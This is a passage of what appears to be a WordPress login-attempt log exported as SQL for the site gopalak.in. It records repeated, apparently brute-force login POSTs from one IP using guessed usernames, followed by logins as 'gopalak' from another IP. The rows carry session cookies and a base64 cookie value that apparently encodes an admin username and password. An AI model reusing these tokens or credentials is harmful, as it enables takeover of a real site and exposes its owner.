T_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745434649.621314;s:12:\"REQUEST_TIME\";i:1745434649;}}','13.201.132.241',0,'2025-04-24 00:27:32','1970-01-01 00:00:00'),(94003,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745434649.6220779;s:12:\"REQUEST_TIME\";i:1745434649;}}','13.201.132.241',0,'2025-04-24 00:27:32','1970-01-01 00:00:00'),(94004,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745434651.5052271;s:12:\"REQUEST_TIME\";i:1745434651;}}','13.201.132.241',0,'2025-04-24 00:27:33','1970-01-01 00:00:00'),(94005,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745434651.5045271;s:12:\"REQUEST_TIME\";i:1745434651;}}','13.201.132.241',0,'2025-04-24 00:27:33','1970-01-01 00:00:00'),(94006,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745435048.3464041;s:12:\"REQUEST_TIME\";i:1745435048;}}','13.201.132.241',0,'2025-04-24 00:34:10','1970-01-01 00:00:00'),(94007,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745435048.347724;s:12:\"REQUEST_TIME\";i:1745435048;}}','13.201.132.241',0,'2025-04-24 00:34:10','1970-01-01 00:00:00'),(94008,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745435048.3775849;s:12:\"REQUEST_TIME\";i:1745435048;}}','13.201.132.241',0,'2025-04-24 00:34:10','1970-01-01 00:00:00'),(94009,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745435048.3912041;s:12:\"REQUEST_TIME\";i:1745435048;}}','13.201.132.241',0,'2025-04-24 00:34:10','1970-01-01 00:00:00'),(94010,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"13.201.132.241\";s:14:\"HTTP_X_REAL_IP\";s:14:\"13.201.132.241\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"13.201.132.241\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745435048.3446131;s:12:\"REQUEST_TIME\";i:1745435048;}}','13.201.132.241',0,'2025-04-24 00:34:10','1970-01-01 00:00:00'),(94011,0,'a:2:{s:8:\"username\";s:7:\"gopalak\";s:6:\"server\";a:46:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:171:\"PHPSESSID=9b8f29e212c865c9090a86c30d31555e; _jwp=1; _uid=fwAAAWgJjIwHR2WXA2NEAg==; swpm_session=71e8f0522b5ad2f282dc5a594c76ead5; wordpress_test_cookie=WP%20Cookie%20check\";s:12:\"HTTP_REFERER\";s:31:\"https://gopalak.in/wp-login.php\";s:19:\"HTTP_SEC_FETCH_USER\";s:2:\"?1\";s:19:\"HTTP_SEC_FETCH_SITE\";s:11:\"same-origin\";s:19:\"HTTP_SEC_FETCH_MODE\";s:8:\"navigate\";s:19:\"HTTP_SEC_FETCH_DEST\";s:8:\"document\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"146.190.97.112\";s:14:\"HTTP_X_REAL_IP\";s:14:\"146.190.97.112\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"146.190.97.112\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745456268.469178;s:12:\"REQUEST_TIME\";i:1745456268;}}','146.190.97.112',1,'2025-04-24 06:27:50','2025-04-24 06:37:57'),(94012,0,'a:2:{s:8:\"username\";s:7:\"gopalak\";s:6:\"server\";a:46:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:205:\"PHPSESSID=9b8f29e212c865c9090a86c30d31555e; _jwp=1; _uid=fwAAAWgJjIwHR2WXA2NEAg==; _wptn=Z29wYWxhaztBZG1pblBBU1M%3D; swpm_session=71e8f0522b5ad2f282dc5a594c76ead5; wordpress_test_cookie=WP%20Cookie%20check\";s:12:\"HTTP_REFERER\";s:31:\"https://gopalak.in/wp-login.php\";s:19:\"HTTP_SEC_FETCH_USER\";s:2:\"?1\";s:19:\"HTTP_SEC_FETCH_SITE\";s:11:\"same-origin\";s:19:\"HTTP_SEC_FETCH_MODE\";s:8:\"navigate\";s:19:\"HTTP_SEC_FETCH_DEST\";s:8:\"document\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"146.190.97.112\";s:14:\"HTTP_X_REAL_IP\";s:14:\"146.190.97.112\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:14:\"146.190.97.112\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745456270